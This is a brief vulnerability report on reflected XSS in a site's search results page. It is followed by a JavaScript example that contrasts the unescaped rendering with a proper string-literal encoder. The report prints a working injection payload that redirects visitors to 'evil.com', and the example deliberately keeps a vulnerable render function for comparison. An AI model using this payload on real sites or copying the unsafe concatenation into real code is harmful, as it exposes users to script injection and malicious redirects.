XSS vulnerability through the search results page.
The search query is sent as a GET parameter and is not escaped when rendered within a JavaScript block on the search results page. This allows code to be executed directly from a malicious URL.
<script type="text/javascript">loadTextValues("");location='http://evil.com'//", "", "");</script>
Reported Won't Fix
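The flaw described above beside a corrected rendering, as an added example that is not part of the original report. The report does not name the server-side language, so JavaScript is used here, and the function names `renderVulnerable`, `jsStringLiteral`, `renderSafe` and `simulate` are hypothetical.

```javascript
// Added example; function names are hypothetical, not from the reported site.

// Before: the raw search term is concatenated into a JS string literal.
function renderVulnerable(query) {
  return '<script type="text/javascript">loadTextValues("' + query +
         '", "", "");</script>';
}

// Encode a value as a JS string literal that is also inert to the HTML parser.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))   // quotes, backslashes, control chars
    .replace(/</g, '\\u003c')            // blocks </script> and <!-- breakouts
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')       // line separators end a literal in
    .replace(/\u2029/g, '\\u2029');      // pre-ES2019 engines
}

// After: the term can only ever arrive as the first argument's data.
function renderSafe(query) {
  return '<script type="text/javascript">loadTextValues(' +
         jsStringLiteral(query) + ', "", "");</script>';
}

// Run the script body against stubs and report what the page code would see.
function simulate(html) {
  const body = html.replace(/^<script[^>]*>/, '').replace(/<\/script>$/, '');
  let firstArg;
  const run = new Function('loadTextValues', 'location', body + '\nreturn location;');
  const location = run((a) => { firstArg = a; }, 'unchanged');
  return { firstArg, location };
}

// The query string value from the report's rendered output.
const reportedQuery = '");location=\'http://evil.com\'//';

console.log(renderVulnerable(reportedQuery), simulate(renderVulnerable(reportedQuery)));
console.log(renderSafe(reportedQuery), simulate(renderSafe(reportedQuery)));
```

HTML-entity escaping alone is the wrong encoder for this context; the value sits inside a JavaScript string within a script element, so it needs JavaScript string encoding that also neutralizes `<`.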